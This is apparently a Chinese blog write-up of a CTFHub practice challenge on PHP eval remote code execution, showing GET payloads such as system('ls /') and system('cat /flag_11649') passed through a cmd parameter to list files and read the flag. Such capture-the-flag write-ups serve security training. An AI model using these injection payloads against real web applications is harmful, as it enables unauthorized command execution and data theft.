CTFHub-RCE eval执行

观察源代码

  • 我们可以发现源代码是request请求,所以我们可以通过GET或者POST请求,利用cmd参数进行命令执行

判断是Windows还是Linux

复制代码
#### 用GET请求

![](https://i-blog.csdnimg.cn/img_convert/3953fb442538c15685b5aa6926a79cba.jpeg)
*

  ```php
  /?cmd=system('ipconfig');
  ```

<!-- -->

* 无回显 说明不是Windows系统 ![](https://i-blog.csdnimg.cn/img_convert/0b03e2d748cacda3d7860d5e27391c10.jpeg)

<!-- -->

*

  ```php
  /?cmd=system('ifconfig');
  ```

<!-- -->

* 可以发现有回显,说明命令执行成功,系统为Linux ![](https://i-blog.csdnimg.cn/img_convert/480728712941dd82146cac1a7ab842d3.jpeg)

查看有哪些文件

复制代码
```php
/?cmd=system('ls');
```

![](https://i-blog.csdnimg.cn/img_convert/24d60e2455ee4331bd91e436a1f8c719.jpeg)
  • 显示只有index.php文件, 我们再查询根目录下的文件
复制代码
```php
/?cmd=system('ls /');
```
  • 发现目标flag文件

打开flag文件

复制代码
```php
/?cmd=system('cat /flag_11649');
```

![](https://i-blog.csdnimg.cn/img_convert/cb6bcfb2dbe991c3d366ba1b4b681326.jpeg)
  • 成功获取flag
相关推荐
计算机毕业设计指导2 小时前
基于Django的内部网络资产发现与管理工具
网络·python·网络安全·django
mooyuan天天5 小时前
CTFHub RCE通关笔记3:文件包含 php://input
文件包含·rce·伪协议·文件包含漏洞·ctfhub·phpinput
余防6 小时前
文件上传漏洞(二)iis6.0 CGI漏洞
前端·安全·web安全·网络安全
mooyuan天天8 小时前
CTFHub RCE通关笔记5:文件包含 远程包含
文件包含·rce·文件包含漏洞·ctfhub·远程包含·本地包含·phpinput
Suckerbin1 天前
burpsuite网络安全学院: JWT attacks靶场通关
网络·笔记·安全·web安全·网络安全
知攻善防实验室1 天前
Notepad++ 本地提权漏洞|复现|分析
测试工具·安全·网络安全·notepad++
RrEeSsEeTt1 天前
【HackTheBox】- Active 靶机学习
网络安全·渗透测试·kali·内网安全·hackthebox·ad域
G皮T1 天前
【安全】TLS 协议介绍
安全·http·网络安全·https·ssl·tls·tls 1.3
btyzadt1 天前
内网信息收集与命令详解
web安全·网络安全
Whoami!1 天前
⸢ 陆 ⸥ ⤳ 可信纵深防御:整体架构
网络安全·信息安全·安全架构